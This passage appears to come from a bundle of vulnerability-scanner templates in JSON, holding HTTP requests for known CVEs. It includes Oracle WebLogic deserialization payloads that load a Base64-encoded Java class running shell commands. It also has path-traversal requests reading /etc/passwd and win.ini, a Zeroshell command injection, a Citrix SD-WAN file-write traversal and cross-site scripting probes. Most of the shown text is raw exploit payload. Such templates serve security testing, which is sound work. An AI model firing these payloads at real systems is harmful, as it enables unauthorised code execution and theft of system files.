index=\"4781\"><byte>118</byte></void><void index=\"4782\"><byte>111</byte></void><void index=\"4783\"><byte>99</byte></void><void index=\"4784\"><byte>97</byte></void><void index=\"4785\"><byte>116</byte></void><void index=\"4786\"><byte>105</byte></void><void index=\"4787\"><byte>111</byte></void><void index=\"4788\"><byte>110</byte></void><void index=\"4789\"><byte>72</byte></void><void index=\"4790\"><byte>97</byte></void><void index=\"4791\"><byte>110</byte></void><void index=\"4792\"><byte>100</byte></void><void index=\"4793\"><byte>108</byte></void><void index=\"4794\"><byte>101</byte></void><void index=\"4795\"><byte>114</byte></void><void index=\"4796\"><byte>85</byte></void><void index=\"4797\"><byte>-54</byte></void><void index=\"4798\"><byte>-11</byte></void><void index=\"4799\"><byte>15</byte></void><void index=\"4800\"><byte>21</byte></void><void index=\"4801\"><byte>-53</byte></void><void index=\"4802\"><byte>126</byte></void><void index=\"4803\"><byte>-91</byte></void><void index=\"4804\"><byte>2</byte></void><void index=\"4805\"><byte>0</byte></void><void index=\"4806\"><byte>2</byte></void><void index=\"4807\"><byte>76</byte></void><void index=\"4808\"><byte>0</byte></void><void index=\"4809\"><byte>12</byte></void><void index=\"4810\"><byte>109</byte></void><void index=\"4811\"><byte>101</byte></void><void index=\"4812\"><byte>109</byte></void><void index=\"4813\"><byte>98</byte></void><void index=\"4814\"><byte>101</byte></void><void index=\"4815\"><byte>114</byte></void><void index=\"4816\"><byte>86</byte></void><void index=\"4817\"><byte>97</byte></void><void index=\"4818\"><byte>108</byte></void><void index=\"4819\"><byte>117</byte></void><void index=\"4820\"><byte>101</byte></void><void index=\"4821\"><byte>115</byte></void><void index=\"4822\"><byte>116</byte></void><void index=\"4823\"><byte>0</byte></void><void index=\"4824\"><byte>15</byte></void><void index=\"4825\"><byte>76</byte></void><void index=\"4826\"><byte>106</byte></void><void index=\"4827\"><byte>97</byte></void><void index=\"4828\"><byte>118</byte></void><void index=\"4829\"><byte>97</byte></void><void index=\"4830\"><byte>47</byte></void><void index=\"4831\"><byte>117</byte></void><void index=\"4832\"><byte>116</byte></void><void index=\"4833\"><byte>105</byte></void><void index=\"4834\"><byte>108</byte></void><void index=\"4835\"><byte>47</byte></void><void index=\"4836\"><byte>77</byte></void><void index=\"4837\"><byte>97</byte></void><void index=\"4838\"><byte>112</byte></void><void index=\"4839\"><byte>59</byte></void><void index=\"4840\"><byte>76</byte></void><void index=\"4841\"><byte>0</byte></void><void index=\"4842\"><byte>4</byte></void><void index=\"4843\"><byte>116</byte></void><void index=\"4844\"><byte>121</byte></void><void index=\"4845\"><byte>112</byte></void><void index=\"4846\"><byte>101</byte></void><void index=\"4847\"><byte>116</byte></void><void index=\"4848\"><byte>0</byte></void><void index=\"4849\"><byte>17</byte></void><void index=\"4850\"><byte>76</byte></void><void index=\"4851\"><byte>106</byte></void><void index=\"4852\"><byte>97</byte></void><void index=\"4853\"><byte>118</byte></void><void index=\"4854\"><byte>97</byte></void><void index=\"4855\"><byte>47</byte></void><void index=\"4856\"><byte>108</byte></void><void index=\"4857\"><byte>97</byte></void><void index=\"4858\"><byte>110</byte></void><void index=\"4859\"><byte>103</byte></void><void index=\"4860\"><byte>47</byte></void><void index=\"4861\"><byte>67</byte></void><void index=\"4862\"><byte>108</byte></void><void index=\"4863\"><byte>97</byte></void><void index=\"4864\"><byte>115</byte></void><void index=\"4865\"><byte>115</byte></void><void index=\"4866\"><byte>59</byte></void><void index=\"4867\"><byte>120</byte></void><void index=\"4868\"><byte>112</byte></void><void index=\"4869\"><byte>115</byte></void><void index=\"4870\"><byte>114</byte></void><void index=\"4871\"><byte>0</byte></void><void index=\"4872\"><byte>17</byte></void><void index=\"4873\"><byte>106</byte></void><void index=\"4874\"><byte>97</byte></void><void index=\"4875\"><byte>118</byte></void><void index=\"4876\"><byte>97</byte></void><void index=\"4877\"><byte>46</byte></void><void index=\"4878\"><byte>117</byte></void><void index=\"4879\"><byte>116</byte></void><void index=\"4880\"><byte>105</byte></void><void index=\"4881\"><byte>108</byte></void><void index=\"4882\"><byte>46</byte></void><void index=\"4883\"><byte>72</byte></void><void index=\"4884\"><byte>97</byte></void><void index=\"4885\"><byte>115</byte></void><void index=\"4886\"><byte>104</byte></void><void index=\"4887\"><byte>77</byte></void><void index=\"4888\"><byte>97</byte></void><void index=\"4889\"><byte>112</byte></void><void index=\"4890\"><byte>5</byte></void><void index=\"4891\"><byte>7</byte></void><void index=\"4892\"><byte>-38</byte></void><void index=\"4893\"><byte>-63</byte></void><void index=\"4894\"><byte>-61</byte></void><void index=\"4895\"><byte>22</byte></void><void index=\"4896\"><byte>96</byte></void><void index=\"4897\"><byte>-47</byte></void><void index=\"4898\"><byte>3</byte></void><void index=\"4899\"><byte>0</byte></void><void index=\"4900\"><byte>2</byte></void><void index=\"4901\"><byte>70</byte></void><void index=\"4902\"><byte>0</byte></void><void index=\"4903\"><byte>10</byte></void><void index=\"4904\"><byte>108</byte></void><void index=\"4905\"><byte>111</byte></void><void index=\"4906\"><byte>97</byte></void><void index=\"4907\"><byte>100</byte></void><void index=\"4908\"><byte>70</byte></void><void index=\"4909\"><byte>97</byte></void><void index=\"4910\"><byte>99</byte></void><void index=\"4911\"><byte>116</byte></void><void index=\"4912\"><byte>111</byte></void><void index=\"4913\"><byte>114</byte></void><void index=\"4914\"><byte>73</byte></void><void index=\"4915\"><byte>0</byte></void><void index=\"4916\"><byte>9</byte></void><void index=\"4917\"><byte>116</byte></void><void index=\"4918\"><byte>104</byte></void><void index=\"4919\"><byte>114</byte></void><void index=\"4920\"><byte>101</byte></void><void index=\"4921\"><byte>115</byte></void><void index=\"4922\"><byte>104</byte></void><void index=\"4923\"><byte>111</byte></void><void index=\"4924\"><byte>108</byte></void><void index=\"4925\"><byte>100</byte></void><void index=\"4926\"><byte>120</byte></void><void index=\"4927\"><byte>112</byte></void><void index=\"4928\"><byte>63</byte></void><void index=\"4929\"><byte>64</byte></void><void index=\"4930\"><byte>0</byte></void><void index=\"4931\"><byte>0</byte></void><void index=\"4932\"><byte>0</byte></void><void index=\"4933\"><byte>0</byte></void><void index=\"4934\"><byte>0</byte></void><void index=\"4935\"><byte>12</byte></void><void index=\"4936\"><byte>119</byte></void><void index=\"4937\"><byte>8</byte></void><void index=\"4938\"><byte>0</byte></void><void index=\"4939\"><byte>0</byte></void><void index=\"4940\"><byte>0</byte></void><void index=\"4941\"><byte>16</byte></void><void index=\"4942\"><byte>0</byte></void><void index=\"4943\"><byte>0</byte></void><void index=\"4944\"><byte>0</byte></void><void index=\"4945\"><byte>1</byte></void><void index=\"4946\"><byte>116</byte></void><void index=\"4947\"><byte>0</byte></void><void index=\"4948\"><byte>8</byte></void><void index=\"4949\"><byte>102</byte></void><void index=\"4950\"><byte>53</byte></void><void index=\"4951\"><byte>97</byte></void><void index=\"4952\"><byte>53</byte></void><void index=\"4953\"><byte>97</byte></void><void index=\"4954\"><byte>54</byte></void><void index=\"4955\"><byte>48</byte></void><void index=\"4956\"><byte>56</byte></void><void index=\"4957\"><byte>113</byte></void><void index=\"4958\"><byte>0</byte></void><void index=\"4959\"><byte>126</byte></void><void index=\"4960\"><byte>0</byte></void><void index=\"4961\"><byte>9</byte></void><void index=\"4962\"><byte>120</byte></void><void index=\"4963\"><byte>118</byte></void><void index=\"4964\"><byte>114</byte></void><void index=\"4965\"><byte>0</byte></void><void index=\"4966\"><byte>29</byte></void><void index=\"4967\"><byte>106</byte></void><void index=\"4968\"><byte>97</byte></void><void index=\"4969\"><byte>118</byte></void><void index=\"4970\"><byte>97</byte></void><void index=\"4971\"><byte>120</byte></void><void index=\"4972\"><byte>46</byte></void><void index=\"4973\"><byte>120</byte></void><void index=\"4974\"><byte>109</byte></void><void index=\"4975\"><byte>108</byte></void><void index=\"4976\"><byte>46</byte></void><void index=\"4977\"><byte>116</byte></void><void index=\"4978\"><byte>114</byte></void><void index=\"4979\"><byte>97</byte></void><void index=\"4980\"><byte>110</byte></void><void index=\"4981\"><byte>115</byte></void><void index=\"4982\"><byte>102</byte></void><void index=\"4983\"><byte>111</byte></void><void index=\"4984\"><byte>114</byte></void><void index=\"4985\"><byte>109</byte></void><void index=\"4986\"><byte>46</byte></void><void index=\"4987\"><byte>84</byte></void><void index=\"4988\"><byte>101</byte></void><void index=\"4989\"><byte>109</byte></void><void index=\"4990\"><byte>112</byte></void><void index=\"4991\"><byte>108</byte></void><void index=\"4992\"><byte>97</byte></void><void index=\"4993\"><byte>116</byte></void><void index=\"4994\"><byte>101</byte></void><void index=\"4995\"><byte>115</byte></void><void index=\"4996\"><byte>0</byte></void><void index=\"4997\"><byte>0</byte></void><void index=\"4998\"><byte>0</byte></void><void index=\"4999\"><byte>0</byte></void><void index=\"5000\"><byte>0</byte></void><void index=\"5001\"><byte>0</byte></void><void index=\"5002\"><byte>0</byte></void><void index=\"5003\"><byte>0</byte></void><void index=\"5004\"><byte>0</byte></void><void index=\"5005\"><byte>0</byte></void><void index=\"5006\"><byte>0</byte></void><void index=\"5007\"><byte>120</byte></void><void index=\"5008\"><byte>112</byte></void><void index=\"5009\"><byte>120</byte></void></array></void></class></work:WorkContext></soapenv:Header><soapenv:Body></soapenv:Body></soapenv:Envelope>\n","POST /wls-wsat/CoordinatorPortType HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding: gzip, deflate\nAccept: */*\nAccept-Language: zh-CN,zh;q=0.9,en;q=0.8\nContent-Type: text/xml\n\n<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:wsa=\"http://www.w3.org/2005/08/addressing\" xmlns:asy=\"http://www.bea.com/async/AsyncResponseService\"><soapenv:Header><wsa:Action>xx</wsa:Action><wsa:RelatesTo>xx</wsa:RelatesTo><work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\"><java><class><string>org.slf4j.ext.EventData</string><void><string><java><void class=\"sun.misc.BASE64Decoder\"><void method=\"decodeBuffer\" id=\"byte_arr\"><string>yv66vgAAADIAYwoAFAA8CgA9AD4KAD0APwoAQABBBwBCCgAFAEMHAEQKAAcARQgARgoABwBHBwBICgALADwKAAsASQoACwBKCABLCgATAEwHAE0IAE4HAE8HAFABAAY8aW5pdD4BAAMoKVYBAARDb2RlAQAPTGluZU51bWJlclRhYmxlAQASTG9jYWxWYXJpYWJsZVRhYmxlAQAEdGhpcwEAEExSZXN1bHRCYXNlRXhlYzsBAAhleGVjX2NtZAEAJihMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9TdHJpbmc7AQADY21kAQASTGphdmEvbGFuZy9TdHJpbmc7AQABcAEAE0xqYXZhL2xhbmcvUHJvY2VzczsBAANmaXMBABVMamF2YS9pby9JbnB1dFN0cmVhbTsBAANpc3IBABtMamF2YS9pby9JbnB1dFN0cmVhbVJlYWRlcjsBAAJicgEAGExqYXZhL2lvL0J1ZmZlcmVkUmVhZGVyOwEABGxpbmUBAAZyZXN1bHQBAA1TdGFja01hcFRhYmxlBwBRBwBSBwBTBwBCBwBEAQAKRXhjZXB0aW9ucwEAB2RvX2V4ZWMBAAFlAQAVTGphdmEvaW8vSU9FeGNlcHRpb247BwBNBwBUAQAEbWFpbgEAFihbTGphdmEvbGFuZy9TdHJpbmc7KVYBAARhcmdzAQATW0xqYXZhL2xhbmcvU3RyaW5nOwEAClNvdXJjZUZpbGUBAChSZXN1bHRCYXNlRXhlYy5qYXZhIGZyb20gSW5wdXRGaWxlT2JqZWN0DAAVABYHAFUMAFYAVwwAWABZBwBSDABaAFsBABlqYXZhL2lvL0lucHV0U3RyZWFtUmVhZGVyDAAVAFwBABZqYXZhL2lvL0J1ZmZlcmVkUmVhZGVyDAAVAF0BAAAMAF4AXwEAF2phdmEvbGFuZy9TdHJpbmdCdWlsZGVyDABgAGEMAGIAXwEAC2NtZC5leGUgL2MgDAAcAB0BABNqYXZhL2lvL0lPRXhjZXB0aW9uAQALL2Jpbi9zaCAtYyABAA5SZXN1bHRCYXNlRXhlYwEAEGphdmEvbGFuZy9PYmplY3QBABBqYXZhL2xhbmcvU3RyaW5nAQARamF2YS9sYW5nL1Byb2Nlc3MBABNqYXZhL2lvL0lucHV0U3RyZWFtAQATamF2YS9sYW5nL0V4Y2VwdGlvbgEAEWphdmEvbGFuZy9SdW50aW1lAQAKZ2V0UnVudGltZQEAFSgpTGphdmEvbGFuZy9SdW50aW1lOwEABGV4ZWMBACcoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvUHJvY2VzczsBAA5nZXRJbnB1dFN0cmVhbQEAFygpTGphdmEvaW8vSW5wdXRTdHJlYW07AQAYKExqYXZhL2lvL0lucHV0U3RyZWFtOylWAQATKExqYXZhL2lvL1JlYWRlcjspVgEACHJlYWRMaW5lAQAUKClMamF2YS9sYW5nL1N0cmluZzsBAAZhcHBlbmQBAC0oTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvU3RyaW5nQnVpbGRlcjsBAAh0b1N0cmluZwAhABMAFAAAAAAABAABABUAFgABABcAAAAvAAEAAQAAAAUqtwABsQAAAAIAGAAAAAYAAQAAAAMAGQAAAAwAAQAAAAUAGgAbAAAACQAcAB0AAgAXAAAA+QADAAcAAABOuAACKrYAA0wrtgAETbsABVkstwAGTrsAB1kttwAIOgQBOgUSCToGGQS2AApZOgXGABy7AAtZtwAMGQa2AA0ZBbYADbYADjoGp//fGQawAAAAAwAYAAAAJgAJAAAABgAIAAcADQAIABYACQAgAAoAIwALACcADAAyAA4ASwARABkAAABIAAcAAABOAB4AHwAAAAgARgAgACEAAQANAEEAIgAjAAIAFgA4ACQAJQADACAALgAmACcABAAjACsAKAAfAAUAJwAnACkAHwAGACoAAAAfAAL/ACcABwcAKwcALAcALQcALgcALwcAKwcAKwAAIwAwAAAABAABABEACQAxAB0AAgAXAAAAqgACAAMAAAA3EglMuwALWbcADBIPtgANKrYADbYADrgAEEynABtNuwALWbcADBIStgANKrYADbYADrgAEEwrsAABAAMAGgAdABEAAwAYAAAAGgAGAAAAFgADABkAGgAeAB0AGwAeAB0ANQAfABkAAAAgAAMAHgAXADIAMwACAAAANwAeAB8AAAADADQAKQAfAAEAKgAAABMAAv8AHQACBwArBwArAAEHADQXADAAAAAEAAEANQAJADYANwACABcAAAArAAAAAQAAAAGxAAAAAgAYAAAABgABAAAANgAZAAAADAABAAAAAQA4ADkAAAAwAAAABAABADUAAQA6AAAAAgA7</string></void></void><void class=\"org.mozilla.classfile.DefiningClassLoader\"><void method=\"defineClass\"><string>ResultBaseExec</string><object idref=\"byte_arr\"></object><void method=\"newInstance\"><void method=\"do_exec\" id=\"result\"><string>id</string></void></void></void></void><void class=\"java.lang.Thread\" method=\"currentThread\"><void method=\"getCurrentWork\" id=\"current_work\"><void method=\"getClass\"><void method=\"getDeclaredField\"><string>connectionHandler</string><void method=\"setAccessible\"><boolean>true</boolean></void><void method=\"get\"><object idref=\"current_work\"></object><void method=\"getServletRequest\"><void method=\"getResponse\"><void method=\"getServletOutputStream\"><void method=\"writeStream\"><object class=\"weblogic.xml.util.StringInputStream\"><object idref=\"result\"></object></object></void><void method=\"flush\"/></void><void method=\"getWriter\"><void method=\"write\"><string></string></void></void></void></void></void></void></void></void></void></java></string></void></class></java></work:WorkContext></soapenv:Header><soapenv:Body><asy:onAsyncDelivery/></soapenv:Body></soapenv:Envelope>\n"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["uid=","gid=","groups="],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-12593","info":{"name":"IceWarp Mail Server <=10.4.4 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/webmail/calendar/minimizer/index.php?style=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini","{{BaseURL}}/webmail/calendar/minimizer/index.php?style=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/etc%5cpasswd"],"matchers-condition":"and","matchers":[{"type":"word","words":["[intl]","root:x:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-15858","info":{"name":"WordPress Woody Ad Snippets <2.2.5 - Cross-Site Scripting/Remote Code Execution","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/insert-php/readme.txt"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","negative":true,"words":["2.2.5"]},{"type":"word","part":"body","words":["Changelog"]},{"type":"word","part":"body","words":["Woody ad snippets"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-8442","info":{"name":"Jira - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/s/{{randstr}}/_/WEB-INF/classes/META-INF/maven/com.atlassian.jira/jira-core/pom.xml","{{BaseURL}}/s/{{randstr}}/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<groupId>com.atlassian.jira</groupId>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-12990","info":{"name":"Citrix SD-WAN Center - Local File Inclusion","severity":"critical"},"requests":[{"raw":["GET /login HTTP/1.1\nHost: {{Hostname}}\n","POST /Collector/appliancesettings/applianceSettingsFileTransfer HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nfilename=../../../../../../home/talariuser/www/app/webroot/files/{{randstr}}&filedata=\n","GET /talari/app/files/{{randstr}} HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n"],"matchers":[{"type":"dsl","dsl":["contains(header, \"text/html\")","status_code_3 == 200","contains(body_1, \"<title>Citrix SD-WAN</title>\")"],"condition":"and"}]}]},{"id":"CVE-2019-12725","info":{"name":"Zeroshell 3.9.0 - Remote Command Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/kerbynet?Action=StartSessionSubmit&User='%0acat%20/etc/passwd%0a'&PW="],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-3403","info":{"name":"Jira - Incorrect Authorization","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/rest/api/2/user/picker?query="],"matchers-condition":"and","matchers":[{"type":"word","words":["\"users\":","\"total\":","\"header\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"word","part":"body","negative":true,"words":["Showing 0 of 0 matching users"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-9955","info":{"name":"Zyxel - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?mp_idx=%22;alert(%271%27);//"],"matchers":[{"type":"word","part":"body","words":["\";alert('1');//","<title>Welcome</title>"],"condition":"and"}]}]},{"id":"CVE-2019-7255","info":{"name":"Linear eMerge E3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/badging/badge_template_v0.php?layout=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Template : <script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-2729","info":{"name":"Oracle WebLogic Server Administration Console - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /wls-wsat/CoordinatorPortType HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/xml\nAccept-Language: zh-CN,zh;q=0.9,en;q=0.8\n\n<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:wsa=\"http://www.w3.org/2005/08/addressing\" xmlns:asy=\"http://www.bea.com/async/AsyncResponseService\"><soapenv:Header><wsa:Action>xx</wsa:Action><wsa:RelatesTo>xx</wsa:RelatesTo><work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\"><java><class><string>org.slf4j.ext.EventData</string><void><string><![CDATA[<java><void class=\"sun.misc.BASE64Decoder\"><void method=\"decodeBuffer\" id=\"byte_arr\"><string>yv66vgAAADIAYwoAFAA8CgA9AD4KAD0APwoAQABBBwBCCgAFAEMHAEQKAAcARQgARgoABwBHBwBICgALADwKAAsASQoACwBKCABLCgATAEwHAE0IAE4HAE8HAFABAAY8aW5pdD4BAAMoKVYBAARDb2RlAQAPTGluZU51bWJlclRhYmxlAQASTG9jYWxWYXJpYWJsZVRhYmxlAQAEdGhpcwEAEExSZXN1bHRCYXNlRXhlYzsBAAhleGVjX2NtZAEAJihMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9TdHJpbmc7AQADY21kAQASTGphdmEvbGFuZy9TdHJpbmc7AQABcAEAE0xqYXZhL2xhbmcvUHJvY2VzczsBAANmaXMBABVMamF2YS9pby9JbnB1dFN0cmVhbTsBAANpc3IBABtMamF2YS9pby9JbnB1dFN0cmVhbVJlYWRlcjsBAAJicgEAGExqYXZhL2lvL0J1ZmZlcmVkUmVhZGVyOwEABGxpbmUBAAZyZXN1bHQBAA1TdGFja01hcFRhYmxlBwBRBwBSBwBTBwBCBwBEAQAKRXhjZXB0aW9ucwEAB2RvX2V4ZWMBAAFlAQAVTGphdmEvaW8vSU9FeGNlcHRpb247BwBNBwBUAQAEbWFpbgEAFihbTGphdmEvbGFuZy9TdHJpbmc7KVYBAARhcmdzAQATW0xqYXZhL2xhbmcvU3RyaW5nOwEAClNvdXJjZUZpbGUBAChSZXN1bHRCYXNlRXhlYy5qYXZhIGZyb20gSW5wdXRGaWxlT2JqZWN0DAAVABYHAFUMAFYAVwwAWABZBwBSDABaAFsBABlqYXZhL2lvL0lucHV0U3RyZWFtUmVhZGVyDAAVAFwBABZqYXZhL2lvL0J1ZmZlcmVkUmVhZGVyDAAVAF0BAAAMAF4AXwEAF2phdmEvbGFuZy9TdHJpbmdCdWlsZGVyDABgAGEMAGIAXwEAC2NtZC5leGUgL2MgDAAcAB0BABNqYXZhL2lvL0lPRXhjZXB0aW9uAQALL2Jpbi9zaCAtYyABAA5SZXN1bHRCYXNlRXhlYwEAEGphdmEvbGFuZy9PYmplY3QBABBqYXZhL2xhbmcvU3RyaW5nAQARamF2YS9sYW5nL1Byb2Nlc3MBABNqYXZhL2lvL0lucHV0U3RyZWFtAQATamF2YS9sYW5nL0V4Y2VwdGlvbgEAEWphdmEvbGFuZy9SdW50aW1lAQAKZ2V0UnVudGltZQEAFSgpTGphdmEvbGFuZy9SdW50aW1lOwEABGV4ZWMBACcoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvUHJvY2VzczsBAA5nZXRJbnB1dFN0cmVhbQEAFygpTGphdmEvaW8vSW5wdXRTdHJlYW07AQAYKExqYXZhL2lvL0lucHV0U3RyZWFtOylWAQATKExqYXZhL2lvL1JlYWRlcjspVgEACHJlYWRMaW5lAQAUKClMamF2YS9sYW5nL1N0cmluZzsBAAZhcHBlbmQBAC0oTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvU3RyaW5nQnVpbGRlcjsBAAh0b1N0cmluZwAhABMAFAAAAAAABAABABUAFgABABcAAAAvAAEAAQAAAAUqtwABsQAAAAIAGAAAAAYAAQAAAAMAGQAAAAwAAQAAAAUAGgAbAAAACQAcAB0AAgAXAAAA+QADAAcAAABOuAACKrYAA0wrtgAETbsABVkstwAGTrsAB1kttwAIOgQBOgUSCToGGQS2AApZOgXGABy7AAtZtwAMGQa2AA0ZBbYADbYADjoGp//fGQawAAAAAwAYAAAAJgAJAAAABgAIAAcADQAIABYACQAgAAoAIwALACcADAAyAA4ASwARABkAAABIAAcAAABOAB4AHwAAAAgARgAgACEAAQANAEEAIgAjAAIAFgA4ACQAJQADACAALgAmACcABAAjACsAKAAfAAUAJwAnACkAHwAGACoAAAAfAAL/ACcABwcAKwcALAcALQcALgcALwcAKwcAKwAAIwAwAAAABAABABEACQAxAB0AAgAXAAAAqgACAAMAAAA3EglMuwALWbcADBIPtgANKrYADbYADrgAEEynABtNuwALWbcADBIStgANKrYADbYADrgAEEwrsAABAAMAGgAdABEAAwAYAAAAGgAGAAAAFgADABkAGgAeAB0AGwAeAB0ANQAfABkAAAAgAAMAHgAXADIAMwACAAAANwAeAB8AAAADADQAKQAfAAEAKgAAABMAAv8AHQACBwArBwArAAEHADQXADAAAAAEAAEANQAJADYANwACABcAAAArAAAAAQAAAAGxAAAAAgAYAAAABgABAAAANgAZAAAADAABAAAAAQA4ADkAAAAwAAAABAABADUAAQA6AAAAAgA7</string></void></void><void class=\"org.mozilla.classfile.DefiningClassLoader\"><void method=\"defineClass\"><string>ResultBaseExec</string><object idref=\"byte_arr\"></object><void method=\"newInstance\"><void method=\"do_exec\" id=\"result\"><string>echo${IFS}COP-9272-9102-EVC|rev</string></void></void></void></void><void class=\"java.lang.Thread\" method=\"currentThread\"><void method=\"getCurrentWork\" id=\"current_work\"><void method=\"getClass\"><void method=\"getDeclaredField\"><string>connectionHandler</string><void method=\"setAccessible\"><boolean>true</boolean></void><void method=\"get\"><object idref=\"current_work\"></object><void method=\"getServletRequest\"><void method=\"getResponse\"><void method=\"getServletOutputStream\"><void method=\"writeStream\"><object class=\"weblogic.xml.util.StringInputStream\"><object idref=\"result\"></object></object></void><void method=\"flush\"/></void><void method=\"getWriter\"><void method=\"write\"><string></string></void></void></void></void></void></void></void></void></void></java>]]></string></void></class></java></work:WorkContext></soapenv:Header><soapenv:Body><asy:onAsyncDelivery/></soapenv:Body></soapenv:Envelope>\n","POST /_async/AsyncResponseService HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/xml\nAccept-Language: zh-CN,zh;q=0.9,en;q=0.8\n\n<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:wsa=\"http://www.w3.org/2005/08/addressing\" xmlns:asy=\"http://www.bea.com/async/AsyncResponseService\"><soapenv:Header><wsa:Action>xx</wsa:Action><wsa:RelatesTo>xx</wsa:RelatesTo><work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\"><java><array method=\"forName\"><string>oracle.toplink.internal.sessions.UnitOfWorkChangeSet</string><void><array class=\"byte\" length=\"3478\"><void index=\"0\"><byte>-84</byte></void><void index=\"1\"><byte>-19</byte></void><void index=\"2\"><byte>0</byte></void><void index=\"3\"><byte>5</byte></void><void index=\"4\"><byte>115</byte></void><void index=\"5\"><byte>114</byte></void><void index=\"6\"><byte>0</byte></void><void index=\"7\"><byte>23</byte></void><void index=\"8\"><byte>106</byte></void><void index=\"9\"><byte>97</byte></void><void index=\"10\"><byte>118</byte></void><void index=\"11\"><byte>97</byte></void><void index=\"12\"><byte>46</byte></void><void index=\"13\"><byte>117</byte></void><void index=\"14\"><byte>116</byte></void><void index=\"15\"><byte>105</byte></void><void index=\"16\"><byte>108</byte></void><void index=\"17\"><byte>46</byte></void><void index=\"18\"><byte>76</byte></void><void index=\"19\"><byte>105</byte></void><void index=\"20\"><byte>110</byte></void><void index=\"21\"><byte>107</byte></void><void index=\"22\"><byte>101</byte></void><void index=\"23\"><byte>100</byte></void><void index=\"24\"><byte>72</byte></void><void index=\"25\"><byte>97</byte></void><void index=\"26\"><byte>115</byte></void><void index=\"27\"><byte>104</byte></void><void index=\"28\"><byte>83</byte></void><void index=\"29\"><byte>101</byte></void><void index=\"30\"><byte>116</byte></void><void index=\"31\"><byte>-40</byte></void><void index=\"32\"><byte>108</byte></void><void index=\"33\"><byte>-41</byte></void><void index=\"34\"><byte>90</byte></void><void index=\"35\"><byte>-107</byte></void><void index=\"36\"><byte>-35</byte></void><void index=\"37\"><byte>42</byte></void><void index=\"38\"><byte>30</byte></void><void index=\"39\"><byte>2</byte></void><void index=\"40\"><byte>0</byte></void><void index=\"41\"><byte>0</byte></void><void index=\"42\"><byte>120</byte></void><void index=\"43\"><byte>114</byte></void><void index=\"44\"><byte>0</byte></void><void index=\"45\"><byte>17</byte></void><void index=\"46\"><byte>106</byte></void><void index=\"47\"><byte>97</byte></void><void index=\"48\"><byte>118</byte></void><void index=\"49\"><byte>97</byte></void><void index=\"50\"><byte>46</byte></void><void index=\"51\"><byte>117</byte></void><void index=\"52\"><byte>116</byte></void><void index=\"53\"><byte>105</byte></void><void index=\"54\"><byte>108</byte></void><void index=\"55\"><byte>46</byte></void><void index=\"56\"><byte>72</byte></void><void index=\"57\"><byte>97</byte></void><void index=\"58\"><byte>115</byte></void><void index=\"59\"><byte>104</byte></void><void index=\"60\"><byte>83</byte></void><void index=\"61\"><byte>101</byte></void><void index=\"62\"><byte>116</byte></void><void index=\"63\"><byte>-70</byte></void><void index=\"64\"><byte>68</byte></void><void index=\"65\"><byte>-123</byte></void><void index=\"66\"><byte>-107</byte></void><void index=\"67\"><byte>-106</byte></void><void index=\"68\"><byte>-72</byte></void><void index=\"69\"><byte>-73</byte></void><void index=\"70\"><byte>52</byte></void><void index=\"71\"><byte>3</byte></void><void index=\"72\"><byte>0</byte></void><void index=\"73\"><byte>0</byte></void><void index=\"74\"><byte>120</byte></void><void index=\"75\"><byte>112</byte></void><void index=\"76\"><byte>119</byte></void><void index=\"77\"><byte>12</byte></void><void index=\"78\"><byte>0</byte></void><void index=\"79\"><byte>0</byte></void><void index=\"80\"><byte>0</byte></void><void index=\"81\"><byte>16</byte></void><void index=\"82\"><byte>63</byte></void><void index=\"83\"><byte>64</byte></void><void index=\"84\"><byte>0</byte></void><void index=\"85\"><byte>0</byte></void><void index=\"86\"><byte>0</byte></void><void index=\"87\"><byte>0</byte></void><void index=\"88\"><byte>0</byte></void><void index=\"89\"><byte>2</byte></void><void index=\"90\"><byte>115</byte></void><void index=\"91\"><byte>114</byte></void><void index=\"92\"><byte>0</byte></void><void 